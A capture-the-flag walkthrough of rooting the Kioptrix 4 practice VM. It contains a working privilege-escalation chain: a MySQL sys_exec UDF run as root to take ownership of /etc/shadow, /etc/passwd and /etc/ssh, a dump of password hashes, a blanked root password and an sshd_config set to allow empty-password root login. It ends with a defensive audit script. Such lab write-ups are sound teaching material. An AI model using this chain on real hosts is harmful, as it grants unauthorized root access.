root 5626 0.0 0.3 11360 3724 ? Ss 13:38 0:00 sshd: john [pri
john 5628 0.0 0.1 11516 1860 ? S 13:38 0:00 sshd: john@pts/
john 5629 0.0 0.3 5892 3816 pts/0 Ss 13:38 0:00 python /bin/ksh
www-data 5640 0.0 0.3 20464 3276 ? S 13:41 0:00 /usr/sbin/apach
www-data 5641 0.0 0.3 20464 3276 ? S 13:42 0:00 /usr/sbin/apach
www-data 5642 0.0 0.3 20464 3276 ? S 13:42 0:00 /usr/sbin/apach
www-data 5643 0.0 0.3 20464 3276 ? S 13:43 0:00 /usr/sbin/apach
john 5653 0.0 0.0 1772 480 pts/0 S 13:44 0:00 sh -c /bin/bash
john 5654 0.0 0.2 5432 2852 pts/0 R 13:44 0:00 /bin/bash
john 5749 0.0 0.0 2644 1012 pts/0 R+ 14:00 0:00 ps -aux
MySQL is running as root: /usr/sbin/mysql in the listing above is owned by root rather than by the mysql user. The web application's database credentials sit in /var/www/checklogin.php, readable by john:
john@Kioptrix4:/var/www$ cat checklogin.php
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name
mysql -u root -h localhost
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 56
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
Let's play with system permissions. A sys_exec() UDF (from lib_mysqludf_sys) is already registered on this box, and because mysqld runs as root, whatever sys_exec() is handed runs as root. Every link in this chain is a misconfiguration an administrator can remove: run mysqld as the mysql user (user=mysql in my.cnf), set a root password, and drop any UDF you did not install yourself (SELECT * FROM mysql.func; lists the registered ones):
mysql> SELECT sys_exec('chown john.john /etc/shadow');
+-----------------------------------------+
| sys_exec('chown john.john /etc/shadow') |
+-----------------------------------------+
| NULL |
+-----------------------------------------+
1 row in set (0.00 sec)
mysql> SELECT sys_exec('chown john.john /etc/passwd');
+-----------------------------------------+
| sys_exec('chown john.john /etc/passwd') |
+-----------------------------------------+
| NULL |
+-----------------------------------------+
1 row in set (0.00 sec)
mysql> SELECT sys_exec('chown -R john.john /root');
+--------------------------------------+
| sys_exec('chown -R john.john /root') |
+--------------------------------------+
| NULL |
+--------------------------------------+
1 row in set (0.01 sec)
mysql> exit
john@Kioptrix4:/home/loneferret$ cd /root
john@Kioptrix4:/root$ ls
congrats.txt lshell-0.9.12
john@Kioptrix4:/root$ ls -la
total 44
drwxr-xr-x 4 john john 4096 2012-02-06 18:46 .
drwxr-xr-x 21 root root 4096 2012-02-06 18:41 ..
-rw------- 1 john john 59 2012-02-06 20:24 .bash_history
-rw-r--r-- 1 john john 2227 2007-10-20 07:51 .bashrc
-rw-r--r-- 1 john john 625 2012-02-06 10:48 congrats.txt
-rw-r--r-- 1 john john 1 2012-02-05 10:38 .lhistory
drwxr-xr-x 8 john john 4096 2012-02-04 17:01 lshell-0.9.12
-rw------- 1 john john 1 2012-02-05 10:38 .mysql_history
-rw------- 1 john john 5 2012-02-06 18:38 .nano_history
-rw-r--r-- 1 john john 141 2007-10-20 07:51 .profile
drwx------ 2 john john 4096 2012-02-06 11:43 .ssh
john@Kioptrix4:/root$ cat congrats.txt
Congratulations!
You've got root.
There is more then one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.
It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.
If you haven't already, check out the other VMs available on:
www.kioptrix.com
Thanks for playing,
loneferret
Let us continue the game:
cat /etc/shadow
root:$1$5GMEyqwV$x0b1nMsYFXvczN0yI0kBB.:15375:0:99999:7:::
daemon:*:15374:0:99999:7:::
bin:*:15374:0:99999:7:::
sys:*:15374:0:99999:7:::
sync:*:15374:0:99999:7:::
games:*:15374:0:99999:7:::
man:*:15374:0:99999:7:::
lp:*:15374:0:99999:7:::
mail:*:15374:0:99999:7:::
news:*:15374:0:99999:7:::
uucp:*:15374:0:99999:7:::
proxy:*:15374:0:99999:7:::
www-data:*:15374:0:99999:7:::
backup:*:15374:0:99999:7:::
list:*:15374:0:99999:7:::
irc:*:15374:0:99999:7:::
gnats:*:15374:0:99999:7:::
nobody:*:15374:0:99999:7:::
libuuid:!:15374:0:99999:7:::
dhcp:*:15374:0:99999:7:::
syslog:*:15374:0:99999:7:::
klog:*:15374:0:99999:7:::
mysql:!:15374:0:99999:7:::
sshd:*:15374:0:99999:7:::
loneferret:$1$/x6RLO82$43aCgYCrK7p2KFwgYw9iU1:15375:0:99999:7:::
john:$1$H.GRhlY6$sKlytDrwFEhu5dULXItWw/:15374:0:99999:7:::
robert:$1$rQRWeUha$ftBrgVvcHYfFFFk6Ut6cM1:15374:0:99999:7:::
Because john now owns /etc/passwd and /etc/shadow, the root entries can be edited directly. Note that sys_exec returns NULL whether or not the command succeeded, so confirm each chown with ls -la before editing (as done for /root above). Change root's line in /etc/passwd to this, leaving the password field empty:
root::0:0:root:/root:/bin/bash
And root's line in /etc/shadow to this:
root::::
An empty password only gives us a remote root shell if sshd is willing to accept it, so take ownership of /etc/ssh as well and edit the daemon's config:
mysql> SELECT sys_exec('chown -R john.john /etc/ssh');
+-----------------------------------------+
| sys_exec('chown -R john.john /etc/ssh') |
+-----------------------------------------+
| NULL |
+-----------------------------------------+
1 row in set (0.01 sec)
Three settings in /etc/ssh/sshd_config matter here: PermitRootLogin yes, PermitEmptyPasswords yes (the packaged default is no, as the comment above it says) and UsePAM no, so sshd checks the empty password against /etc/shadow itself instead of handing it to PAM, where Ubuntu's pam_unix with nullok_secure would refuse an empty password over SSH. Again the sys_exec result is NULL; ls -la /etc/ssh confirms the ownership change before editing.
vim sshd_config
# Package generated configuration file
# See the sshd(8) manpage for details
# What ports, IPs and protocols we listen for
Port 22
# Use these options to restrict which interfaces/protocols sshd will bind to
#ListenAddress ::
ListenAddress 0.0.0.0
Protocol 2
# HostKeys for protocol version 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
#Privilege Separation is turned on for security
#UsePrivilegeSeparation yes
# Lifetime and size of ephemeral version 1 server key
KeyRegenerationInterval 3600
ServerKeyBits 768
# Logging
SyslogFacility AUTH
LogLevel INFO
# Authentication:
LoginGraceTime 120
PermitRootLogin yes
StrictModes yes
RSAAuthentication yes
PubkeyAuthentication yes
AuthorizedKeysFile %h/.ssh/authorized_keys
# Don't read the user's ~/.rhosts and ~/.shosts files
IgnoreRhosts yes
# For this to work you will also need host keys in /etc/ssh_known_hosts
RhostsRSAAuthentication no
# similar for protocol version 2
HostbasedAuthentication no
# Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication
#IgnoreUserKnownHosts yes
# To enable empty passwords, change to yes (NOT RECOMMENDED)
PermitEmptyPasswords yes
# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no
# Change to no to disable tunnelled clear text passwords
#PasswordAuthentication yes
# Kerberos options
#KerberosAuthentication no
#KerberosGetAFSToken no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes
X11Forwarding yes
X11DisplayOffset 10
PrintMotd no
PrintLastLog no
TCPKeepAlive yes
#UseLogin no
#MaxStartups 10:30:60
#Banner /etc/issue.net
# Allow client to pass locale environment variables
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server
UsePAM no
"sshd_config" 77L, 1872C written
Let's reboot so sshd re-reads its config (restarting the ssh service would do as well). sys_exec runs as the user mysqld runs as, which on this box is root, as the broadcast from root@Kioptrix4 confirms:
mysql> SELECT sys_exec('reboot');
Broadcast message from root@Kioptrix4
(unknown) at 15:40 ...
The system is going down for reboot NOW!
+--------------------+
| sys_exec('reboot') |
+--------------------+
| NULL |
+--------------------+
1 row in set (0.02 sec)
Game over: root now logs in over SSH with an empty password:
ssh root@192.168.180.136
root@Kioptrix4:~# ls -la
total 44
drwxr-xr-x 4 john john 4096 2012-02-06 18:46 .
drwxr-xr-x 21 root root 4096 2012-02-06 18:41 ..
-rw------- 1 john john 62 2016-07-05 15:51 .bash_history
-rw-r--r-- 1 john john 2227 2007-10-20 07:51 .bashrc
-rw-r--r-- 1 john john 625 2012-02-06 10:48 congrats.txt
-rw-r--r-- 1 john john 1 2012-02-05 10:38 .lhistory
drwxr-xr-x 8 john john 4096 2012-02-04 17:01 lshell-0.9.12
-rw------- 1 john john 1 2012-02-05 10:38 .mysql_history
-rw------- 1 john john 5 2012-02-06 18:38 .nano_history
-rw-r--r-- 1 john john 141 2007-10-20 07:51 .profile
drwx------ 2 john john 4096 2016-07-05 15:23 .ssh
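The chain above leaves three kinds of traces on the host: system files owned by a non-root user, empty password fields in /etc/passwd and /etc/shadow, and an sshd_config that accepts them. The following audit script is an added example written for this review, not code from the page or from Kioptrix; the sample passwd, shadow, sshd_config and ownership inputs are constructed to mirror the files shown above (the MUST_BE_ROOT list and all function names are my own choices). It also covers a caveat that bites when cleaning up after an incident: sshd honours the first value of a directive, so a "PermitRootLogin no" appended at the bottom of the file changes nothing.

```python
"""Audit for the traces this escalation leaves behind: system files no longer
owned by root, empty password fields, and sshd settings that turn an empty
root password into a remote root login. All inputs below are constructed."""
import re

# Paths that must stay root-owned (assumed list; extend for your hosts).
MUST_BE_ROOT = ("/etc/passwd", "/etc/shadow", "/etc/group",
                "/etc/ssh/sshd_config", "/root")

# sshd directives whose listed value is what makes the empty-password login work.
RISKY_SSHD = {
    "permitrootlogin": ("yes", "root may authenticate directly over SSH"),
    "permitemptypasswords": ("yes", "accounts with an empty password may log in"),
    "usepam": ("no", "sshd checks the password itself, so pam_unix cannot refuse it"),
}

# Constructed samples modelled on this page's files.
SAMPLE_PASSWD = """root::0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
"""
SAMPLE_SHADOW = """root::::
daemon:*:15374:0:99999:7:::
mysql:!:15374:0:99999:7:::
john:$1$H.GRhlY6$sKlytDrwFEhu5dULXItWw/:15374:0:99999:7:::
"""
SAMPLE_SSHD_CONFIG = """Port 22
PermitRootLogin yes
# To enable empty passwords, change to yes (NOT RECOMMENDED)
PermitEmptyPasswords yes
UsePAM no
# appended later by a "hardening" script: ineffective, sshd keeps the FIRST value
PermitRootLogin no
"""
# Output of: stat -c '%U %n' /etc/group /etc/passwd ...   (constructed)
SAMPLE_OWNERS = """root /etc/group
john /etc/passwd
john /etc/shadow
john /etc/ssh/sshd_config
john /root
"""

def nonblank(text):
    return (line for line in text.splitlines() if line.strip())

def audit_passwd(text):
    """Flag malformed entries and empty password fields (no password needed)."""
    findings = []
    for line in nonblank(text):
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(f"passwd: {fields[0]} entry has {len(fields)} fields, expected 7")
        elif fields[1] == "":
            findings.append(f"passwd: {fields[0]} has an empty password field")
    return findings

def audit_shadow(text):
    """Flag non-standard field counts, empty hashes and md5crypt ($1$) hashes."""
    findings = []
    for line in nonblank(text):
        fields = line.split(":")
        name, pw = fields[0], (fields[1] if len(fields) > 1 else "")
        if len(fields) != 9:  # "root::::" from this page has only 5
            findings.append(f"shadow: {name} entry has {len(fields)} fields, expected 9")
        if pw == "":
            findings.append(f"shadow: {name} has an empty password hash")
        elif pw.startswith("$1$"):
            findings.append(f"shadow: {name} uses md5crypt, cheap to brute-force")
    return findings

def parse_sshd_config(text):
    """Effective directives: comments dropped, keys lower-cased, and the FIRST
    occurrence wins, as sshd_config(5) specifies; later overrides are ignored."""
    effective = {}
    for line in nonblank(text):
        line = line.split("#", 1)[0].strip()
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        if len(parts) == 2:
            effective.setdefault(parts[0].lower(), parts[1].strip())
    return effective

def audit_sshd_config(text):
    eff = parse_sshd_config(text)
    return [f"sshd_config: {key} {bad}: {why}"
            for key, (bad, why) in RISKY_SSHD.items() if eff.get(key, "").lower() == bad]

def audit_ownership(stat_output, must_be_root=MUST_BE_ROOT):
    """Take 'owner path' lines as printed by stat -c '%U %n' and flag non-root owners."""
    findings = []
    for line in nonblank(stat_output):
        owner, path = line.split(None, 1)
        if path in must_be_root and owner != "root":
            findings.append(f"ownership: {path} is owned by {owner}, expected root")
    return findings

def run_audit(passwd=SAMPLE_PASSWD, shadow=SAMPLE_SHADOW,
              sshd=SAMPLE_SSHD_CONFIG, owners=SAMPLE_OWNERS):
    return {"passwd": audit_passwd(passwd), "shadow": audit_shadow(shadow),
            "sshd_config": audit_sshd_config(sshd), "ownership": audit_ownership(owners)}

if __name__ == "__main__":
    for findings in run_audit().values():
        print("\n".join(findings))
```

On a live host, feed run_audit() the contents of /etc/passwd, /etc/shadow (root needed) and /etc/ssh/sshd_config, plus the output of stat -c '%U %n' over the paths in MUST_BE_ROOT. Against the samples it reports root's empty passwd field, the five-field "root::::" shadow line with its empty hash, john's md5crypt hash, all three risky sshd settings (the trailing "PermitRootLogin no" is correctly ignored) and the four john-owned paths.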
Regards,
Yuriy Stanchev/URIX